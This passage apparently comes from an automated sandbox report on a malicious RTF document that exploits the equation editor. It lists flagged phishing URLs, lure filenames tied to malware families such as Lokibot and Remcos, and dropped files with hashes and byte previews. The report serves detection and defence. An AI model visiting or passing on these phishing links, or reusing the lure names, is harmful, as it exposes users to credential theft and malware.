                                              https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                              • 34.252.251.147
                                              http://ipprimetv.comGet hashmaliciousHTMLPhisherBrowse
                                              • 54.93.152.195
                                              https://besthomepackers.co.in/?gclid=EAIaIQobChMI-vCM3_a0_wIV845LBR26iAe6EAEYASAAEgKIC_D_BwEGet hashmaliciousHTMLPhisherBrowse
                                              • 35.158.42.58
                                              http://besthomepackers.co.inGet hashmaliciousHTMLPhisherBrowse
                                              • 54.217.92.205
                                              http://eulerian.officiel-des-vacances.com/dynclick/officiel-vacances/?eml-publisher=MREL&eml-name=mindbaz_retargeting_m4&eml-ctype=CTYPE&eemail=958c5e006c0d43c2ae3f77f528032e88&eurl=https%3A%2F%2F/chainstrading.net%2FEmail%2FVerify%2Fsf_rand_string_lowercase6%2F%2F%2F%2FamFjb2Iuc21pdGhAYWdzaGVhbHRoLmNvbQ==Get hashmaliciousUnknownBrowse
                                              • 54.77.223.183
                                              https://r20.rs6.net/tn.jsp?f=001BIxBKiUtsTCIpWtdP9HlmRA4n4Zx_5DCQxecjBK2gxGIVCHzwONDEtz6pbl-p-8_JbD1fjk3SC16S62mrLLVicxja_GJnpT_xOt8p5oMd5tX3P3sE9CXfBpw8FZ9uzgJQYO7Vj7dWCC9ayG61VkPr3thfDVEKOLIRfqyW6OamvMF_ZbO0IsM76C8JpvGErXPwgn1vnDJ7Yg=&c=SkbFlSz6eLH_ZUa-Ur2h3fC2JKYKVsFLpMn_u2m5fkPpAErB3jIxDA==&ch=5I7PHuL_HLs9zPnQtkSA_rkKBzuvp3ri_VVRDWIObXcykp6_xSqtJQ==&__=?e=YmF1ZG9pbi5kZWJ1c3N5QHhmYWIuY29tGet hashmaliciousUnknownBrowse
                                              • 52.222.149.109
                                              https://r20.rs6.net/tn.jsp?f=001XWEUmpd20x3YwaeHVP3-3XdlE2vmwHgg-IZ3fvNGlZkQ1Ikvv4-rSsqEm8QLGDo8kFQ8PYcFSEWWXidiyQS8P0vkSXHkezLgs46Xm_TybCuaig9OP6MznrvOiWHQr-0Jm3HYXkE_CDRdCzOTb1qO44IPAcjT6yoJ-syErY8uf6nAJ6jznNgBX7D6Mo1XNLRvx1F-brlSLd8=&c=ZOd9nWobPZnf-kOmJ0-EvZxWNeIQRh8nuKyWgy2CrTKQKKbeWyh2vg==&ch=7VaepYrd8GCBrE4yL3OZd3i_dN7i-dyjbyxz7CwjxJ_RMevwr8Rb-w==&__=?e=baudoin.debussy@xfab.comGet hashmaliciousCaptcha PhishBrowse
                                              • 52.222.153.83
                                              https://daokee-cloud.sg3.quickconnect.to/'Get hashmaliciousUnknownBrowse
                                              • 52.222.174.42
                                              https://eurofinsgenomics.com/handlers/sitenavigator.aspx?returnurl=http://qvk9gw.csb.app.mcas-df.ms/Get hashmaliciousUnknownBrowse
                                              • 76.76.21.98
                                              http://keith793.softr.appGet hashmaliciousUnknownBrowse
                                              • 3.64.247.100
                                              https://spitefulaquamarineaddition.perssonwork.repl.co/intro.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.31.44
                                              https://bestpathediting.com/cgi/joe@some.com/joe@some.com/Get hashmaliciousUnknownBrowse
                                              • 3.120.21.45
                                              http://metaammask.com/Get hashmaliciousUnknownBrowse
                                              • 76.223.31.44
                                              https://ithlpdesks.com/?r=52f710bb-eb79-4e1a-924c-51265bc5490eGet hashmaliciousUnknownBrowse
                                              • 63.32.244.164
                                              http://www.procobremexico.orgGet hashmaliciousUnknownBrowse
                                              • 108.156.2.69
                                              https://www.soiel.it/trk/link/63e4bb990fc4b7.09013355/?url=https://cxk3jb.youthf.ru/MYnNhbmR2aWdAdnFjaGVlc2UuY29tGet hashmaliciousUnknownBrowse
                                              • 54.77.223.183
                                              https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=g3W42bFO4UGhsEEOIvE-jbIJuFhbRV9EpIjhF2aJNkNUQ1M5R1IxUjRQNDJNWURXRktMRzNUQVhYTi4uGet hashmaliciousUnknownBrowse
                                              • 108.138.199.12
                                              https://www.akccii.net/filedoc/Get hashmaliciousHTMLPhisherBrowse
                                              • 76.76.21.22

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dSHIPPING_DOCUMENTS.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              PURCHASE_ORDER.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              211772038.batGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              m8CWd1c3Fa.docxGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              RO10098.docx.docGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              29trxd5c012976cebc44375f96945dffc73ba.xlsxGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              shipping_documents.docx.docGet hashmaliciousHTMLPhisherBrowse
                                              • 103.242.124.88
                                              FOB $Corporation new Order.docxGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Alfa_Laval_Aalborg_AS_Statement_of_Account.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              Remittance HN00715.docGet hashmaliciousGuLoaderBrowse
                                              • 103.242.124.88
                                              Walmart_PO_WM05312023-018.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              NF_7867_e_7868.ppamGet hashmaliciousRevengeRATBrowse
                                              • 103.242.124.88
                                              SUMM_RFQ220.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Modis_list.docx.docGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              NOA_&_Pre-loading_docs_of_CBHU8720230431.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              Automann-_Order2#44096.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              company_profile.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              NEW_ORDER.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              DHL_AWB_50_No3354087.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              7560391AA-Med_List.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              7dcce5b76c8b17472d024758970a406bFusion 360 Client Downloader.exeGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Ach_Remittance_advice.xlsxGet hashmaliciousHTMLPhisherBrowse
                                              • 103.242.124.88
                                              SHIPPING_DOCUMENTS.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              PURCHASE_ORDER.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              m8CWd1c3Fa.docxGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              RO10098.docx.docGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              29trxd5c012976cebc44375f96945dffc73ba.xlsxGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              shipping_documents.docx.docGet hashmaliciousHTMLPhisherBrowse
                                              • 103.242.124.88
                                              FOB $Corporation new Order.docxGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Alfa_Laval_Aalborg_AS_Statement_of_Account.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              Walmart_PO_WM05312023-018.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              SUMM_RFQ220.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Modis_list.docx.docGet hashmaliciousRemcosBrowse
                                              • 103.242.124.88
                                              18042023_Sotramac - Modelo Financiero_test.xlsxGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              NOA_&_Pre-loading_docs_of_CBHU8720230431.docx.docGet hashmaliciousLokibotBrowse
                                              • 103.242.124.88
                                              Automann-_Order2#44096.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              company_profile.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              NEW_ORDER.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              DHL_AWB_50_No3354087.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88
                                              Automann-_Order#44096.docx.docGet hashmaliciousUnknownBrowse
                                              • 103.242.124.88

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.288129199614528
                                              Encrypted:false
                                              SSDEEP:48:I36heRBUO+4lmjVbEuQCRDNsXkqQx+0XIXrcCGtpPCGtpYH:K0eL+8mBbExC3ykqV0YbcCGtVCGt2H
                                              MD5:8351240393198E3EB47363C8D7D0B254
                                              SHA1:1B8EE1BC1701A70D5042E567E05539031AF61213
                                              SHA-256:3A4C190C4286836DE675A6C29B6E4C3B4CEC7786EB3334674B845C6B2A37F144
                                              SHA-512:19C52120D6FE84C9B7C67DFE652351A6A1F124CF17468DD08D44E5CB7D5A180ECD960CEA4FC9DD7942B255045E7E50F45C346A7ABF4EE87DF035DBBEAEB17AEA
                                              Malicious:false
                                              Preview:......M.eFy...z......3B....x.[.S,...X.F...Fa.q.............................x&..;.G.z\....p.........|.f...C.yF..Y...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7648904F-A606-42FB-9A15-61FD78F62B9B}.FSD

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.6621376761683788
                                              Encrypted:false
                                              SSDEEP:96:KF3FCyK5bcLo7OJ/k0iyOoGOUwQJtCW93y7dVt7DrT4BpfBVlDrT4BpBBVP8DrT8:oFK5xyDG+S1C9d/95
                                              MD5:9B3C4AEB4A7B90DD9E9D12C574A97A7D
                                              SHA1:D47BA2784E1206FAF1A38DA77EC2D6A602B4E53C
                                              SHA-256:058922334595C579A8E1B69BE968FE08F6CD474472D05BAD2D3E4C19AD7238DB
                                              SHA-512:92BA1DBE79E5AF6194C5A0FB7975DB952E385579E1F4BE1BDC3076642E1CCFD0729B8646A7B6714DC84848FC5F3AC1C5C5D0DA7FD14C9DB0F974760A50A5CDE0
                                              Malicious:false
                                              Preview:......M.eFy...z....6 .E....6..S,...X.F...Fa.q.............................Mf.G.E..*_..8..........Q.S. .@..^.P...S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):114
                                              Entropy (8bit):3.913466487930504
                                              Encrypted:false
                                              SSDEEP:3:yVlgsRlz+LleZpVJSfHIl9Kwf57Qjr1lTDZ276:yPblzuHQl9KwfWTDZ22
                                              MD5:1A11D9EB0943011E70A64A6E54DEA0B3
                                              SHA1:E7CEC85BB43ACC27FA4367C6CCE281E81D13993A
                                              SHA-256:3C50744854648651A4773189783B0A351A5303FE74D44D00D9739221DC561489
                                              SHA-512:ED07429196CF4C0C3EE1740CAE7B41D1ABA9AB6FD1E1E69353D41660FC9AA1966F0AAB94FE550FC6F2350F141665D912B226DF17146AE5D9705137BD0603B8BE
                                              Malicious:false
                                              Preview:..H..@....b..q....]F.S.D.-.{.7.6.4.8.9.0.4.F.-.A.6.0.6.-.4.2.F.B.-.9.A.1.5.-.6.1.F.D.7.8.F.6.2.B.9.B.}...F.S.D..

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.28753946448296647
                                              Encrypted:false
                                              SSDEEP:96:K1dL+z8ruigfzSmrx19STsof2zSGySvPcM0FngBKSvPcM0FngBTH:EdoosOyCyL
                                              MD5:6C6D47ECA64DD4D3DFC0A1A8C1BBFAA4
                                              SHA1:1C40603CB6240B43665CF2A542D99C5D530ED6C0
                                              SHA-256:5533A1685E34D719E2B3F97F0AB301F43A93D308D1460DF89463C1D8F6F10244
                                              SHA-512:18350C333AA8A2044DA7D77F1AD78437935769B88F14B56FB4BA0B35D0204985B3BE7428B4EBEA870C032DF1FF38571CD7C9001D4353E6AEB507B617143C2F8D
                                              Malicious:false
                                              Preview:......M.eFy...z.K....KI..V.P...S,...X.F...Fa.q.............................sm.*..@.M..6...........(....VN.I41.E...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{17FEC979-D930-452E-96E6-C3B91970B6FB}.FSD

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.22072632573120426
                                              Encrypted:false
                                              SSDEEP:24:I3w0cKgcRLwnM0B34tgqRFq75ZF1irhSqTHimvR1Es5xwVQA53R7BainiX4:I3hXRUrBSCFZFGrtnEs5WKA5BIcX
                                              MD5:0859BD510B003807902701AC04D9FADE
                                              SHA1:3CBF71CDFBE942B4A2E877C7F528AB2BDD499D3E
                                              SHA-256:3B1C2A03006EBCB0C393E3C8BA90343D59E103C5BA723E5C29E704F907C64953
                                              SHA-512:62091A353CBD1CCDA501B29BC0CB939E551E795E0D713DEB713FE8911A22122EDE9FB60881C9812AE784A6E0FD056BBCB62F09C6E6CA0694FABC442E01D7A34F
                                              Malicious:false
                                              Preview:......M.eFy...z....-.D....F..]S,...X.F...Fa.q................................_lL.....3./........".4....G..*.qL.sP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):114
                                              Entropy (8bit):3.9385081806697437
                                              Encrypted:false
                                              SSDEEP:3:yVlgsRlzJFcYDhyWR6jfc4NTSRZ276:yPblzJmYDD8j04NWRZ22
                                              MD5:001A4F83FF78101EBB9008BA5B885DC1
                                              SHA1:8F63C8666C5864B22D614B300ED228EF68AB5EAB
                                              SHA-256:E4FC5314586AA3C9E0D776581B12EBBB486A253C6EA7452D4BEC521F51760269
                                              SHA-512:985D672577B47F4248CE928EA0723B18A66E4586E22BB3C2F974DE63FDD4326A1D6F05D99FE65F44F6CECF435241CC299F23961441F77E90DC59E90640BAEBBE
                                              Malicious:false
                                              Preview:..H..@....b..q....]F.S.D.-.{.1.7.F.E.C.9.7.9.-.D.9.3.0.-.4.5.2.E.-.9.6.E.6.-.C.3.B.9.1.9.7.0.B.6.F.B.}...F.S.D..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exe

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):847872
                                              Entropy (8bit):7.9692047719076005
                                              Encrypted:false
                                              SSDEEP:24576:jzIj6o9o//FfodxH+TXwo7w3G4W//b2yRKtCuf7N:jcj6oO1fodk4W/zsX
                                              MD5:CFF6C145EB350EA686F48866937E0A76
                                              SHA1:A2E7E3B13BB6C3D8BA38E350AFD7BB4164514407
                                              SHA-256:8614FECD71F9F61A8742B4AB97F28D154F2428B4E91A5A5B42A1E05F93CFA477
                                              SHA-512:E3AF67C14F4D85A656725BBC03A38FDE8ECEC3FA03B6AF973BAA18F596401B1A768ED1D6BF82513365609A1600EB914741902F98461DF40F0528F0158C252910
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0.................. ....@...... .......................@............`...@......@............... ............................... ..............................D................................................................ ..H............text........ ...................... ..`.rsrc........ ......................@..@........................................H........x...C...............H...........................................0..........+.(E.:7. .. ....c p.R.a(*... ..). Xk!.a(*... .... ....a(*...(.... ..E. r<M.a(*... .. ..R.a ...Va(*...o.... <..if ....a(*... E... 9h..a(*...o.... ...o .~.oa(*... .7w( b..(a(*...o.... !.. ....b ..T1a(*... 1... ....b ^.s.a(*...o......(..... >.. .+..a(*.... .JV. N).+X ..(6a(*.... ._d. 9.l.a(*... ..T. ...ka .-..a(*... ..C. ....c ....a(*...(......(....(............%....%.~.....%...%.............o.....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):23780
                                              Entropy (8bit):3.947079649696971
                                              Encrypted:false
                                              SSDEEP:384:zGd7klKcfXDQfC4b9Htjrp8PounsxkWuZAPivWHh/EplN3v9dZdSTf5u/mvMReW:CilKcfXKn9Nj+PouncknZmEplN9dZITO
                                              MD5:DF476B115A000832A0D688C512418B64
                                              SHA1:74241C8E7F4AA8656D5053077660F6E4C8AFB6B8
                                              SHA-256:28C1FFE0CB33C5B6FDCC5D9352F061EC686E821E7D4346676C5BB702F2361FA3
                                              SHA-512:0DA79D46A6286EEA4ABFBD0544526F6A667289D891E54CD767F8D5107D191A6943BA0757BA2166C7F80CC06F6F5EED5EE4BEFA15CA718F867931D112648122DB
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].doc, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:{\rtf1.......{\*\auld461347873 \.}.{\411120589.7].@?>]=12_@++;!`$%.$6?<^<?._`;?2'..&&9:..,8&%.?*.???~?]0%??1?.<./4%+`;%',(??5?&*9`_-=]~^-|2%+[`[%0.|=*[~=)?->.'$=96^7%/%2+9.11=2.?6?.,..'['1.-+??~6;[@.??4'`?/@=&??|.>%?/;?1^+-+&_?)(>.?(?>43^[./(0=.28?`5?23?>3.6:?]7|-]88#_;_.%^`1$?>/.3'%~^+?^?-$?/()_~^0?.=(+)&)>,<<.$$!%~]2&%.|>=(#@;3%.??*3#??:??7@)%|,+)`;?`:2$@*(|@5<?.(-.|*+<.,*8?%~^9??^_<;4/?..;;%+?8.%)7?#_1??3!_^?!*&?2?#@??&~|?@#8598`@[.2|;<>|.@$5,=+'`.51[)?911[_(0&.7%`75)($!,:'-_`?%<3%!@5^;%?(0?62.?|?<5/>?#4*2':?`*?/~<1?_>%942#75-%2#<(?,#/=&`*?8:43?.(43]-;&-%[?=?]]1.?%/*?>_*`.<;/5_.?3/?6*,@3?*3?(36|!(]54^7?.0=.0|4|+.)=3<%.<_^[-!.^~'?_;(.5[?%0~?3..?=*_)(#(=~2~.%#,`56'*_@4?15.0.^*3.:#.#?)?,;.|[-98..$-=8?/_;?_.;~=5.3|.-[$+`:].1-,&|?.>&44.[>~161).?>6<|1+@4?*@02&%~0!75`=./@,?.?+.8:?7~8.#?;1_4>#1>%5%%6&6)``5]!|%83.7:9]&!`.'*7*.,>+'7-?0%:)+|..8&4]`,|~*@:38..)9@].8^.?~.9+<~.%[:<5?.;346-0.]/^.2.5%?4.)%8;?>;.?!3.=|???.$9:*|*;0=7-5.$+%]&%..=];[._?4%:24&?7519+.+~'^??1*2?4`.?$=>;02?&%=)&?<-7|>:(2.=.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\221800EC.png

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PNG image data, 1210 x 900, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):178060
                                              Entropy (8bit):7.963381025322248
                                              Encrypted:false
                                              SSDEEP:3072:WvGjIVr352700LWZgI0vlnnR+SfQiilGuhgEYYpX166pTLiCQAZbQzKg:WvVoBW0NnR/Q5ngJ6lhQgEGg
                                              MD5:0388082E67880AC81583366A73ED49C2
                                              SHA1:1A4F0C34FF93C7158B993D1B9E3A120338BB45D6
                                              SHA-256:CE47B33F51E1D3AEA2F28B75E12E8D649126AFC6C22E95967D6AD4DD4D7262DF
                                              SHA-512:5D8E0CA6FE24463234D46C1160C6BE77AA9F0E5AC2A43EC15130CC537091771806F5269F9E54085E940174E060A7F3B6B81D0BB59C4BD682A9F1D6C6524BD72F
                                              Malicious:false
                                              Preview:.PNG........IHDR.............)-.d....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....$iA..... ..._....p{w....P..HF.#F.+.D......G.H8.......9....?O.wf..U....3...\.lO.SU..Tu.....fffffff...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........hffffff=8.......Y...ffffff.........8ct{a.........8c..s.333333;...g..b.yffffff'...A@.1.......d;...`..^.q.6W.*..1T..^vT..Z..b...bv,.^~Xq.b....k......8.....q.....Vp....w.....t....!~.....C0cB.^>[...NCb...;bc.g4qc.'.......#.<.....\...1F.dD.VO..5...##.Fd.a. #...9.bv,....Q....Q0C..sdDAF.... ....!...(8w.V.#..2..#..m..b....!.1!BU..(... ....#..3. #.N.9. 8 ..Q.....33.3..bo....Q..S.A. .....`.%..ac......1GF..?AF.......Q.... ..f.8}.2. #......>..(8..2.`.......z.fL.P.##.2..4$...B..2...&...h...

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):23780
                                              Entropy (8bit):3.947079649696971
                                              Encrypted:false
                                              SSDEEP:384:zGd7klKcfXDQfC4b9Htjrp8PounsxkWuZAPivWHh/EplN3v9dZdSTf5u/mvMReW:CilKcfXKn9Nj+PouncknZmEplN9dZITO
                                              MD5:DF476B115A000832A0D688C512418B64
                                              SHA1:74241C8E7F4AA8656D5053077660F6E4C8AFB6B8
                                              SHA-256:28C1FFE0CB33C5B6FDCC5D9352F061EC686E821E7D4346676C5BB702F2361FA3
                                              SHA-512:0DA79D46A6286EEA4ABFBD0544526F6A667289D891E54CD767F8D5107D191A6943BA0757BA2166C7F80CC06F6F5EED5EE4BEFA15CA718F867931D112648122DB
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.doc, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:{\rtf1.......{\*\auld461347873 \.}.{\411120589.7].@?>]=12_@++;!`$%.$6?<^<?._`;?2'..&&9:..,8&%.?*.???~?]0%??1?.<./4%+`;%',(??5?&*9`_-=]~^-|2%+[`[%0.|=*[~=)?->.'$=96^7%/%2+9.11=2.?6?.,..'['1.-+??~6;[@.??4'`?/@=&??|.>%?/;?1^+-+&_?)(>.?(?>43^[./(0=.28?`5?23?>3.6:?]7|-]88#_;_.%^`1$?>/.3'%~^+?^?-$?/()_~^0?.=(+)&)>,<<.$$!%~]2&%.|>=(#@;3%.??*3#??:??7@)%|,+)`;?`:2$@*(|@5<?.(-.|*+<.,*8?%~^9??^_<;4/?..;;%+?8.%)7?#_1??3!_^?!*&?2?#@??&~|?@#8598`@[.2|;<>|.@$5,=+'`.51[)?911[_(0&.7%`75)($!,:'-_`?%<3%!@5^;%?(0?62.?|?<5/>?#4*2':?`*?/~<1?_>%942#75-%2#<(?,#/=&`*?8:43?.(43]-;&-%[?=?]]1.?%/*?>_*`.<;/5_.?3/?6*,@3?*3?(36|!(]54^7?.0=.0|4|+.)=3<%.<_^[-!.^~'?_;(.5[?%0~?3..?=*_)(#(=~2~.%#,`56'*_@4?15.0.^*3.:#.#?)?,;.|[-98..$-=8?/_;?_.;~=5.3|.-[$+`:].1-,&|?.>&44.[>~161).?>6<|1+@4?*@02&%~0!75`=./@,?.?+.8:?7~8.#?;1_4>#1>%5%%6&6)``5]!|%83.7:9]&!`.'*7*.,>+'7-?0%:)+|..8&4]`,|~*@:38..)9@].8^.?~.9+<~.%[:<5?.;346-0.]/^.2.5%?4.)%8;?>;.?!3.=|???.$9:*|*;0=7-5.$+%]&%..=];[._?4%:24&?7519+.+~'^??1*2?4`.?$=>;02?&%=)&?<-7|>:(2.=.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):6144
                                              Entropy (8bit):4.073026276703223
                                              Encrypted:false
                                              SSDEEP:48:rL6r/blR7G10I2J1z9H+LZbRM2iS+DHdRR65tnVnPqY:ytRE0IKz9HEvT+bbA5d
                                              MD5:A0F331E7578344E153AD541004C49C79
                                              SHA1:6149E4770A5932BBE5CAC92A44FAD54D74121563
                                              SHA-256:3F4CBCAC767CF94C41E40E90EB346274883F03FA7B5D74A96B0719452DAFDD80
                                              SHA-512:A314103FFBDB15FAC2D6FCC8C2C17A145328F133910A90D64D9898B6F076B8C3766CA2754726F28F031D82EFEA2E9F46269A7B559F12856E44362DD3DD385D12
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FFCA2AC-0B54-4172-8773-FAA06E8B5866}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:X:X
                                              MD5:32649384730B2D61C9E79D46DE589115
                                              SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
                                              SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
                                              SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
                                              Malicious:false
                                              Preview:..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47BFCE73-8358-43CE-9DEB-709A86322B78}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6656
                                              Entropy (8bit):3.4424407751363404
                                              Encrypted:false
                                              SSDEEP:192:AppqzfAhnmfCkVe0mMEqObspLWhKCpvLt:6pmfARmBV2HqOQUpt
                                              MD5:C9DDB2987D1C74CD5B077EC70B484033
                                              SHA1:930BD6C7FD817D837DCD6F56C00FD545E106BD53
                                              SHA-256:20DC6CB4A0DCAE45D0D5A3D9BD861110F9329481D2EAD68E81AAB96621563B93
                                              SHA-512:9B12647F9627C40C70643539A2302140FA3DAC3D67BE1A330C6DEB61D5A4A500AD68E75DA83676069AF04289D20B75C51C5EEC7D632D009261CD98AA25503FD6
                                              Malicious:false
